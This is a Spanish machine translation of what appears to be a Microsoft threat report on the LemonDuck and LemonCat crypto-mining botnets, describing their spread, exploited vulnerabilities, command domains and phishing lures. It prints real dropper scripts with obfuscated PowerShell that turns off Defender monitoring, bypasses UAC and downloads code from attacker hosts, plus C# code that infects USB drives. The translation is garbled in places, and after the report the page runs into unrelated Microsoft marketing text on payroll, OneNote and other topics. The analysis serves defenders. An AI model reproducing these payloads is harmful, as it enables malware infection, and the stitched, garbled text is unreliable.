‎Cuando los mineros de monedas evolucionan, Parte 1: Exponiendo LemonDuck y LemonCat, infraestructura moderna de malware de minería‎

‎La lucha contra las amenazas actuales a las empresas y su prevención requieren una protección integral centrada en abordar todo el alcance y el impacto de los ataques. Cualquier cosa que pueda‎‎obtener acceso a las‎‎máquinas, incluso el llamado malware de productos básicos, puede generar amenazas más peligrosas. Hemos visto esto en troyanos bancarios que sirven como punto de entrada para ataques de ransomware y manos en el teclado. LemonDuck, un malware actualizado activamente y robusto que es conocido principalmente por sus objetivos de minería de bots y criptomonedas, siguió la misma trayectoria cuando adoptó un comportamiento más sofisticado y escaló sus operaciones. Hoy en día, más allá de usar recursos para sus actividades tradicionales de bots y minería, LemonDuck roba credenciales, elimina los controles de seguridad, se propaga a través de correos electrónicos, se mueve lateralmente y, en última instancia, deja caer más herramientas para la actividad operada por humanos.‎

black laptop computer beside black framed eyeglasses on brown wooden table

‎La amenaza de LemonDuck a las empresas también está en el hecho de que es una amenaza multiplataforma. Es una de las pocas familias de malware bot documentadas que se dirige a los sistemas Linux, así como a los dispositivos Windows. Utiliza una amplia gama de mecanismos‎‎de difusión: correos electrónicos de phishing, exploits, dispositivos USB, fuerza bruta, entre otros,‎‎y ha demostrado que puede aprovechar rápidamente noticias, eventos o el lanzamiento de nuevos exploits para ejecutar campañas efectivas. Por ejemplo, en 2020, se observó el uso de señuelos con temática COVID-19 en ataques por correo electrónico. En 2021, explotó ‎‎las vulnerabilidades‎‎ de Exchange Server recién parcheadas para obtener acceso a sistemas obsoletos.‎

‎Esta amenaza, sin embargo, no se limita a vulnerabilidades nuevas o populares. Continúa utilizando vulnerabilidades más antiguas, que benefician a los atacantes en momentos en que el enfoque cambia a parchear una vulnerabilidad popular en lugar de investigar el compromiso. En particular, LemonDuck elimina a otros atacantes de un dispositivo comprometido al deshacerse del malware de la competencia y prevenir nuevas infecciones mediante parches de las mismas vulnerabilidades que utilizó para obtener acceso.‎

‎En los primeros años, LemonDuck se dirigió fuertemente a China, pero sus operaciones se han expandido desde entonces para incluir a muchos otros países, centrándose en los sectores de fabricación e IoT. Hoy en día, LemonDuck impacta en un rango geográfico muy grande, con los Estados Unidos, Rusia, China, Alemania, el Reino Unido, India, Corea, Canadá, Francia y Vietnam viendo la mayoría de los encuentros.‎

‎Figura 1. Distribución global de la actividad de la red de bots LemonDuck‎

‎En 2021, las campañas de LemonDuck comenzaron a utilizar una infraestructura y herramientas de comando y control (C2) más diversificadas. Esta actualización apoyó el marcado aumento en las acciones de manos en el teclado después de la violación, que variaba dependiendo del valor percibido de los dispositivos comprometidos para los atacantes. A pesar de todas estas actualizaciones, sin embargo, LemonDuck todavía utiliza C2s, funciones, estructuras de script y nombres de variables durante mucho más tiempo que el malware promedio. Esto es probablemente debido a su uso de proveedores de alojamiento a prueba de balas como Epik Holdings, que es poco probable que tome cualquier parte de la infraestructura lemonduck fuera de línea, incluso cuando se informa de acciones maliciosas, lo que permite LemonDuck persistir y seguir siendo una amenaza.‎

‎La investigación en profundidad de las infraestructuras de malware de varios tamaños y operaciones proporciona información valiosa sobre la amplitud de las amenazas a las que se enfrentan las organizaciones hoy en día. En el caso de LemonDuck, la amenaza es multiplataforma, persistente y en constante evolución. Investigaciones como esta enfatizan la importancia de tener una visibilidad completa de la amplia gama de amenazas, así como la capacidad de correlacionar actividades simples y dispares como la minería de monedas con ataques adversarios más peligrosos.‎

‎Infraestructura de LemonDuck y LemonCat‎

‎La documentación más antigua de LemonDuck fue de sus campañas de criptomonedas en mayo de 2019. Estas campañas incluían scripts de PowerShell que empleaban scripts adicionales iniciados por una tarea programada. La tarea se utilizó para traer la herramienta PCASTLE para lograr un par de objetivos: abusar de la explotación EternalBlue SMB, así como usar la fuerza bruta o pasar el hash para moverse lateralmente y comenzar la operación de nuevo. Muchos de estos comportamientos todavía se observan en las campañas de LemondDuck hoy en día.‎

‎LemonDuck lleva el nombre de la variable “Lemon_Duck” en uno de los scripts de PowerShell mencionados. La variable se utiliza a menudo como agente de usuario, junto con los números asignados, para los dispositivos infectados. El formato usaba dos conjuntos de caracteres alfabéticos separados por guiones, por ejemplo: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. El término todavía aparece en los scripts de PowerShell, así como en muchos de los scripts de ejecución, específicamente en una función llamada SIEX, que se usa para asignar un agente de usuario único durante la conexión a botnets en ataques tan recientemente como junio de 2021.‎

‎LemonDuck utiliza con frecuencia material de código abierto construido a partir de recursos también utilizados por otras redes de bots, por lo que hay muchos componentes de esta amenaza que parecen familiares. Los investigadores de Microsoft son conscientes de dos estructuras operativas distintas, que ambos utilizan el malware LemonDuck pero son potencialmente operados por dos entidades diferentes para objetivos separados.‎

‎La primera, que llamamos la infraestructura “Pato”, utiliza infraestructuras históricas discutidas en este informe. Es muy consistente en la ejecución de campañas y realiza actividades de seguimiento limitadas. Esta infraestructura rara vez se ve junto con el compromiso del dispositivo de borde como un método de infección, y es más probable que tenga nombres para mostrar aleatorios para sus sitios C2, y siempre se observa utilizando “Lemon_Duck” explícitamente en el script.‎

‎La segunda infraestructura, a la que‎‎llamamos infraestructura “Cat”, por usar principalmente dos dominios con la palabra “cat” en ellos (‎‎sqlnetcat[.] com‎‎, ‎‎netcatkit[.] com‎‎)—‎‎surgió en enero de 2021. Se utilizó en ataques explotando vulnerabilidades en Microsoft Exchange Server. Hoy en día, la infraestructura Cat se utiliza en ataques que normalmente resultan en la instalación de puerta trasera, el robo de credenciales y datos, y la entrega de malware. A menudo se ve la entrega del malware Ramnit.‎

‎Ejemplos de dominios Duck‎‎Dominios Cat de ejemplo‎
‎cdnimages[.] Xyz‎‎bb3u9[.] con‎‎zz3r0[.] con‎‎pp6r1[.] con‎‎amynx[.] con‎‎ackng[.] con‎‎hwqloan[.] con‎‎js88[.] en‎‎zer9g[.] con‎‎b69kq[.] con‎‎sqlnetcat[.] con‎‎netcatkit[.] con‎‎abajo[.] sqlnetcat[.] COM‎ 

‎Las infraestructuras Duck y Cat usan subdominios similares y usan los mismos nombres de tarea, como “blackball”. Ambas infraestructuras también utilizan los mismos componentes empaquetados alojados en sitios similares o idénticos para sus scripts de minería, movimiento lateral y eliminación de competencia, así como muchas de las mismas llamadas de función.‎

‎El hecho de que la infraestructura cat se utiliza para campañas más peligrosas no despriorizar las infecciones de malware de la infraestructura duck. En cambio, esta inteligencia agrega un contexto importante para comprender esta amenaza: el mismo conjunto de herramientas, acceso y métodos se puede volver a utilizar a intervalos dinámicos, con un mayor impacto. A pesar de las implicaciones comunes de que los mineros criptomoneda son menos amenazantes que otros programas maliciosos, su funcionalidad principal refleja el software no monetizado, por lo que cualquier infección botnet digno de priorización.‎

‎Figura 2. Cadena de ataque LemonDuck de las infraestructuras Duck y Cat‎

‎Acceso inicial‎

‎LemonDuck se propaga en una variedad de formas, pero los dos métodos principales son (1) compromisos que son iniciados por el borde o facilitados por implantes de bot que se mueven lateralmente dentro de una organización, o (2) campañas de correo electrónico iniciadas por bots.‎

‎LemonDuck actúa como un cargador para muchas otras actividades de seguimiento, pero una si sus funciones principales es propagarse comprometiendo otros sistemas. Desde su primera aparición, los operadores de LemonDuck han aprovechado los análisis contra dispositivos Windows y Linux para SMB, Exchange, SQL, Hadoop, REDIS, RDP u otros dispositivos perimetrales abiertos o débilmente autenticados que podrían ser vulnerables al rociado de contraseñas o vulnerabilidades de aplicaciones como CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon) y CVE-2021-27065 (ProxyLogon).‎

‎Una vez dentro de un sistema con un buzón de Outlook, como parte de su comportamiento de explotación normal, LemonDuck intenta ejecutar un script que utiliza las credenciales presentes en el dispositivo. El script indica al buzón que envíe copias de un mensaje de suplantación de identidad (phishing) con mensajes y datos adjuntos preestablecidos a todos los contactos.‎

‎Debido a este método de mensajería de contacto, no se aplican los controles de seguridad que se basan en determinar si un correo electrónico se envía desde un remitente sospechoso. Esto significa que las políticas de seguridad de correo electrónico que reducen el escaneo o la cobertura del correo interno deben volver a evaluarse, ya que el envío de correos electrónicos a través del raspado de contactos es muy efectivo para evitar los controles de correo electrónico.‎

‎Desde mediados de 2020 hasta marzo de 2021, los temas de correo electrónico y el contenido del cuerpo de LemonDuck se han mantenido estáticos, al igual que los nombres y formatos de los archivos adjuntos. Estos nombres y formatos de archivos adjuntos han cambiado muy poco con respecto a campañas similares que ocurrieron a principios de 2020.‎

‎Asuntos de correo electrónico de ejemplo ‎‎Ejemplo de contenido del cuerpo del correo electrónico‎
‎La verdad del COVID-19‎‎COVID-19 nCov Información especial OMS‎‎AVISO DE HALTH:CORONAVIRUS‎‎Wtf‎‎Lo que el fcuk‎‎Adiós‎‎carta de despedida‎‎archivo roto‎‎¿Esta es su orden?‎‎El virus en realidad proviene de los Estados Unidos de América‎‎información muy importante para el Covid-19‎‎consulte el documento adjunto para su acción y discreción.‎‎el brote de CORONAVIRUS es motivo de preocupación, especialmente cuando el personal de forign ha llegado recientemente o llegará a varios intt en un futuro próximo.‎‎¿qué te pasa?¿estás fuera de tu mente!!!!!‎‎¿estás fuera de tu mente!!!!! ¿qué te pasa?‎‎ad ad siéndolo, mantente en contacto‎‎me puedes ayudar a arreglar el archivo,no puedo leerlo‎‎el archivo está roto, no puedo abrirlo‎

‎El archivo adjunto utilizado para estos señuelos es uno de tres tipos: .doc, .js o un .zip que contiene un archivo de .js. Sea cual sea el tipo, el archivo se denomina “Léame”. En ocasiones, los tres tipos están presentes en el mismo correo electrónico.‎

‎Figura 3. Correo electrónico de ejemplo‎

‎Aunque muchos proveedores de seguridad detectan javascript, es posible que se clasifique con nombres de detección genéricos. Podría ser valioso para las organizaciones desinfectar JavaScript o VBScript ejecutando o llamando a mensajes (como PowerShell) directamente desde descargas de correo a través de soluciones como ‎‎reglas de detección personalizadas.‎

‎Desde que LemonDuck comenzó a funcionar, el .zip a .js método de ejecución de archivos es el más común. JavaScript ha reemplazado la tarea programada que LemonDuck usó anteriormente para iniciar el script de PowerShell.The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. Este script de PowerShell se ha visto muy similar a lo largo de 2020 y 2021, con cambios menores dependiendo de la versión, lo que indica un desarrollo continuo. A continuación se muestra una comparación de los cambios de las iteraciones más recientes de las descargas entregadas por correo electrónico y las de abril de 2020.‎

‎Script de PowerShell de abril de 2020‎‎Script de PowerShell de marzo de 2021‎
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken.
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1);
//This File is broken.

‎Después de enviar los correos electrónicos, la bandeja de entrada se limpia para eliminar los rastros de estos correos. Este método de autodisparcimiento se intenta en cualquier dispositivo afectado que tenga un buzón, independientemente de si se trata de un servidor de Exchange.‎

‎Otros métodos comunes de infección incluyen el movimiento dentro del entorno comprometido, así como a través de USB y unidades conectadas. Estos procesos a menudo se inician automáticamente y han ocurrido consistentemente a lo largo de la totalidad de la operación de LemonDuck.‎

‎Estos métodos se ejecutan como una serie de scripts de C# que reúnen las unidades disponibles para la infección. También crean una lista en ejecución de unidades que ya están infectadas en función de si encuentra la amenaza ya instalada. Una vez comprobados con la lista en ejecución de unidades infectadas, estos scripts intentan crear un conjunto de archivos ocultos en el directorio de inicio, incluida una copia del ‎‎archivo Léame.js‎‎. Cualquier dispositivo que ha sido afectado por los implantes LemonDuck en cualquier momento podría haber tenido cualquier número de unidades conectadas a él que se ven comprometidas de esta manera. Esto hace que este comportamiento sea un posible vector de entrada para ataques adicionales.‎

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
{
if (blacklist.Contains(drive.Name))
{ continue;}
Console.WriteLine("Detect drive:"+drive.Name);
if (IsSupported(drive))
{
if (!File.Exists(drive + home + inf_data))
{
Console.WriteLine("Try to infect "+drive.Name);
if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
{
blacklist.Add(drive.Name);
}
}
else {
Console.WriteLine(drive.Name+" already infected!");
blacklist.Add(drive.Name);
}
}
else{
blacklist.Add(drive.Name);

‎Protección integral contra una operación de malware de gran alcance‎

‎La visibilidad entre dominios y la defensa coordinada entregada por ‎Microsoft 365‎ defensor‎‎ está diseñado para la amplia gama y la creciente sofisticación de las amenazas que LemonDuck ejemplifica. ‎Microsoft 365‎ Defender tiene protecciones líderes en la industria impulsadas por IA que pueden detener amenazas de múltiples componentes como LemonDuck en dominios y plataformas. ‎Microsoft 365‎ Defensor de ‎‎Oficina 365‎‎ detecta los correos electrónicos maliciosos enviados por la botnet LemonDuck para entregar cargas útiles de malware, así como propagar el cargador de bots. Microsoft Defender for Endpoint detecta y bloquea los implantes, las cargas útiles y la actividad malintencionada de LemonDuck en Linux y Windows.‎

‎Más importante aún, ‎Microsoft 365‎ Defender proporciona herramientas de investigación enriquecidas que pueden exponer detecciones de actividad de LemonDuck, incluidos los intentos de comprometer y hacerse un hueco en la red, para que los equipos de operaciones de seguridad puedan responder y resolver estos ataques de manera eficiente y segura. ‎Microsoft 365‎ Defender correlaciona las señales multiplataforma y entre dominios para pintar la cadena de ataque de extremo a extremo, lo que permite a las organizaciones ver el impacto total de un ataque. También publicamos un artículo de análisis de amenazas sobre esta amenaza. ‎Microsoft 365‎ Los clientes de Defender pueden usar este informe para obtener detalles técnicos importantes, orientación para la investigación, incidentes consolidados y pasos para mitigar esta amenaza en particular y los ciberataques modernos en general.‎

Tome decisiones controladas por datos con predicciones de pagos

Tome decisiones controladas por datos con predicciones de pagos de clientes, administración de flujo de caja y pronósticos. Suscríbase para obtener más información sobre cómo administrar el riesgo y el fraude con Microsoft.

View: Tome decisiones controladas por datos con predicciones de pagos

Cómo manejar la nómina cuando caen los ingresos

Aún en épocas de altos ingresos, el manejo de la nómina puede complicar la operación de las pequeñas y medianas empresas (Pymes). En momentos de incertidumbre económica, e incluso de una caída en las ventas y la rentabilidad, el reto se vuelve más grande.

Lo importante es que, como dueño del negocio, no caigas en la angustia ni en la parálisis. Y que, en conjunto con tu equipo, analices la situación con objetividad, pienses en soluciones creativas y te adelantes a cualquier escenario. ¿Cómo? A través de algunas de estas estrategias.

1. Quita grasa a la operación

Tener que despedir empleados debería ser la última opción; no sólo por el costo que eso implica, sino porque el equipo es el activo más importante que tenemos para crecer. Así que el primer paso es hacer más “delgada” la operación al eliminar todos esos gastos innecesarios que puedan impedirte cumplir con el pago de la nómina u otras obligaciones que tienes con tus colaboradores.

Reúnete con el contador o administrador de la empresa y los directores de cada área para analizar cada línea del presupuesto mensual. La pregunta más importante que deberías hacerte es: ¿este producto o servicio tiene un impacto en la generación de prospectos y en el cierre de ventas? Si la respuesta es no, elimínalo.

En caso de que no puedas suprimir un gasto, busca opciones más económicas. Por ejemplo, si tienes contratado un servicio de telefonía e Internet, habla con tu proveedor y pregúntale si puede ofrecerte un plan más conveniente. Considera también la posibilidad de trabajar con freelancers para funciones como el manejo de las redes sociales, el diseño de material promocional o la mensajería.

2. Incorpora prácticas de trabajo flexible

El segundo paso para evitar tener que hacer recortes de personal es pensar en medidas de contingencia para reducir la presión sobre el pago de la nómina y otros beneficios. Por ejemplo, eliminar temporalmente los bonos por productividad, la bonificación de la telefonía celular o, en caso de que aplique, de la membresía del gimnasio o de una cámara empresarial. Esto, en general, sólo aplica para los altos ejecutivos.

También puedes proponer a algunos empleados reducir su horas o días de trabajo, y por lo tanto su pago mensual. Siempre con la idea de volver a la normalidad en determinado tiempo.

Otras opciones incluyen mantener la modalidad de trabajo remoto, pues permite a tus colaboradores ahorrar en gastos como la gasolina, el mantenimiento del automóvil o el transporte público. Y a tu empresa, reducir el monto de las facturas de la energía eléctrica, el proveedor del servicio de limpieza o el del mantenimiento de los equipos.

3. Elimina el estrés con la tecnología

La fluctuación en los ingresos y las nuevas prácticas de trabajo flexible pueden estresar al área de contabilidad y finanzas, que es la encargada del cálculo y el manejo de la nómina. Piensa solamente en las complicaciones que puede ocasionar el registro de la asistencia y productividad de los empleados que ahora están haciendo home office.

Apoya a tu equipo con la tecnología que necesita para realizar un cálculo exacto de las percepciones y deducciones de los trabajadores, de acuerdo con las disposiciones fiscales y laborales vigentes, pero también con los últimos acuerdos laborales realizados en la empresa. Para ello, invierte en un sistema de nómina eficiente que te permita controlar a tu personal a través de dispositivos móviles, mientras trabajan desde su casa o en ruta. Ten en cuenta que ahora hay proveedores que ofrecen el uso de este tipo de plataformas de administración por un pago mensual, y que la contratación incluye una prueba gratis por 30 días. ¡Busca opciones y referencias!

4. Lidera con empatía y capacidad de diálogo

Por último, no olvides que en tiempos de dificultad es vital mantener la motivación y el compromiso del equipo. Por lo que antes de comunicar o proponer cualquier medida que afecte las condiciones laborales, habla con honestidad acerca de la situación de la empresa, de los retos del mercado y cuál es el plan estratégico para los próximos meses. De lo contrario, tus colaboradores se sentirán amenazados o maltratados, y podrían buscar nuevas opciones de empleo. Eso es especialmente peligroso en el caso del mejor talento.

Otro consejo importante es que hagas que tus empleados se sientan protagonistas de los nuevos retos que la empresa tiene que enfrentar: cuéntales cuáles son las tácticas y herramientas que la compañía aplicará en los próximos meses para mejorar su propuesta de valor, para mantener a los clientes actuales y para generar nuevos prospectos. Así como el papel que puede jugar todo el equipo para alcanzar esos resultados. Cuando lleguen las buenas noticias, compártelas. Y, en lo posible, piensa en mecanismos de compensación y premios para los colaboradores más comprometidos y que hayan visto reducidos sus ingresos.

Síguenos en Facebook.

Noticias destacadas sobre Teams

No se pierda las últimas noticias en tecnología. En este artículo de Forbes se resumen las noticias más recientes sobre la plataforma de Teams en Virtual Microsoft Build 2020. Los puntos clave incluyen la integración con Microsoft Power Platform y otras oportunidades con Power BI, el desarrollo de aplicaciones para Teams y las mejoras en la administración de la programación con ayuda de la plataforma. Suscríbase ahora.

Read More…

Reduzca los costos con una oferta inmejorable

Aunque la innovación ha sustituido el ahorro de costos como el principal impulsor de la migración a la nube para muchas empresas, la migración a la nube debe ser ventajosa para sus ganancias. Microsoft Azure ofrece opciones de ahorro de costos únicas.

View: Reduzca los costos con una oferta inmejorable

Libro electrónico sobre el personal del futuro

Los nuevos niveles de conectividad y las tecnologías avanzadas como la AI permiten a las empresas procesar más datos a mayor escala. La AI juega uno de los roles más importantes, en términos de interrupciones y oportunidades resultantes, para nuestro sector y nuestro personal. Al ver hacia un futuro impulsado por una asociación entre las computadoras y los seres humanos, debemos enfrentar estos desafíos de frente: ¿Qué impacto tendrá la AI en el empleo y los puestos de trabajo? ¿Cómo nos aseguramos de que la AI se diseñe, se utilice y se gobierne de forma responsable? Explore las respuestas a estas preguntas y más en este valioso libro electrónico.

View: Libro electrónico sobre el personal del futuro

‎Insertar detalles de la reunión de Outlook en OneNote‎

‎Si desea dar a las notas una apariencia más coherente y proporcionar un registro más completo de las reuniones, puede agregar detalles de la reunión de Outlook a las notas de OneNote. Los detalles de la reunión pueden incluir la fecha y la ubicación, la agenda, el tema y los asistentes.‎

‎Nota:‎‎ Deberá tener Outlook 2016 y OneNote 2016 instalados en el mismo equipo para agregar detalles de la reunión a las notas.‎

  1. ‎En OneNote, elija ‎‎Inicio‎‎ > ‎‎Detalles de la reunión‎‎.‎Captura de pantalla del botón Detalles de la reunión en OneNote 2016.
  2. ‎En el menú que aparece, siga uno de estos procedimientos:‎
    • ‎Para seleccionar una reunión que se produce hoy, elija su hora y asunto en la lista.‎
    • ‎Para seleccionar una reunión que se produce en un día diferente, seleccione ‎‎Elegir una reunión de otro día‎‎ y, a continuación, elija el icono de calendario para seleccionar una fecha específica o haga clic en los botones Día ‎‎anterior‎‎ o ‎‎Día siguiente‎‎ para mostrar una reunión pasada o futura. Elija la hora y el asunto de la reunión que desee y, a continuación, elija ‎‎Insertar detalles‎‎.‎

‎Consejo:‎‎ Para cada reunión que seleccione, sus detalles se insertarán en una nueva página. Si desea incluir también esta información en cualquiera de las notas existentes, mueva el puntero del mouse sobre los detalles insertados, haga clic para seleccionar el contenedor de notas que aparece y, a continuación, copie (Ctrl+C) y pegue (Ctrl+V) esos detalles en otra parte de las notas. ‎

‎Los detalles de la reunión se agregan a OneNote como texto. Puede agregar, cambiar o eliminar libremente cualquier parte de los detalles de la reunión en OneNote sin afectar al aviso de reunión original en el calendario de Outlook. Por ejemplo, puede eliminar los nombres de los asistentes invitados que no estuvieron en la reunión para tener un registro de quién asistió realmente.‎

The City of Houston: Security as a job

Para la ciudad de Houston, la modernización es una oportunidad para proteger las operaciones gubernamentales. Los tres funcionarios principales de las soluciones se enfocan en la recuperación/respuesta ante desastres, la seguridad de las escuelas y el transporte. Al acceder a datos más seguros gracias a la innovación de Microsoft IoT, la ciudad de Houston puede responder a cualquier crisis y garantizar la seguridad pública.

View…

El rol de la AI y el análisis de las personas en el desarrollo de los líderes del mañana

Mientras la inversión en soluciones de negocios digitales sigue aumentando, los empleados son el elemento esencial de cualquier empresa. Este artículo de Forbes cubre las formas clave en que la AI y Analytics ayudan a las organizaciones a contratar a las personas adecuadas y a formarlas para el éxito.

Read More…

American Red Cross – Power Platform y Microsoft Teams: Microsoft Ignite 2019

The American Red Crossimplementó un conjunto de productos de Microsoft para optimizar las operaciones, lo cual les permitió centrarse en su misión principal de aliviar el sufrimiento humano. Desde el intercambio de información y la organización del trabajo en Teams, hasta la coordinación con otras agencias de ayuda mediante Microsoft Power BI durante la atención de un desastre, vea este video para conocer la historia completa.

View…